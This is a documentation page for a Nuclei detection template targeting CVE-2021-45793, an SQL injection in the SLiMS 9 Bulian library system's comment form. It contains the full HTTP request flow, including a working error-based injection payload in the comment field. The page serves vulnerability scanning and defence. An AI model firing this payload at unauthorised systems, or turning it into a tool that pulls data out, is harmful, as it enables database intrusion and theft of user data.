Skip to content
Nuclei Templates

Slims9 Bulian 9.4.2 - SQL Injection

ID: CVE-2021-45793

Severity: high

Author: nblirwn

Tags: cve2021,cve,slims,sqli

Description

Section titled “Description”

Slims9 Bulian 9.4.2 is affected by SQL injection in lib/comment.inc.php. User data can be obtained.

YAML Source

Section titled “YAML Source”
id: CVE-2021-45793


info:
  name: Slims9 Bulian 9.4.2 - SQL Injection
  author: nblirwn
  severity: high
  description: |
    Slims9 Bulian 9.4.2 is affected by SQL injection in lib/comment.inc.php. User data can be obtained.
  reference:
    - https://github.com/slims/slims9_bulian/issues/123
    - https://nvd.nist.gov/vuln/detail/CVE-2021-45793
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-45793
    cwe-id: CWE-89
    cpe: cpe:2.3:a:slims:senayan_library_management_system:9.4.2:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: slims
    product: senayan_library_management_system
  tags: cve2021,cve,slims,sqli


variables:
  num: "999999999"


flow: http(1) && http(2) && http(3)


http:
  - raw:
      - |
        GET /index.php?p=member&destination= HTTP/1.1
        Host: {{Hostname}}


      - |
        POST /index.php?p=member&destination= HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        memberID={{username}}&memberPassWord={{password}}&_csrf_token_{{csrf_token}}={{csrf_token2}}&logMeIn=Login


    extractors:
      - type: regex
        name: csrf_token
        part: body
        group: 1
        regex:
          - 'name="_csrf_token_([a-f0-9]+)"'
        internal: true


      - type: regex
        name: csrf_token2
        part: body
        group: 1
        regex:
          - 'value="([a-f0-9]+)"/>'
        internal: true


  - raw:
      - |
        GET /index.php?p=show_detail&id=1 HTTP/1.1
        Host: {{Hostname}}


    extractors:
      - type: regex
        name: csrf_token3
        part: body
        group: 1
        regex:
          - 'value="([a-f0-9]+)"/>'
        internal: true


  - raw:
      - |
        POST /index.php?p=show_detail&id=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        comment=%27and%2F**%2F1%3D%28updatexml%281%2Cconcat%280x3a%2Cmd5%28{{num}}%29%29%2C1%29%29%2F**%2Fand%2F**%2F%271%27%3D%271&SaveComment=Save+comment&_csrf_token_{{csrf_token}}={{csrf_token3}}


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "c8c605999f3d8352d7bb792cf3fd"


      - type: status
        status:
          - 200
# digest: 4a0a00473045022065c8a61ba401da95766a85b43a0c4ab860d8093feeadd0709a7159717293ce41022100d79b60130c6e0aaca3c0acf13448b3f3e3795529bea874169914a3ae9fa653e9:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-45793.yaml"

View on Github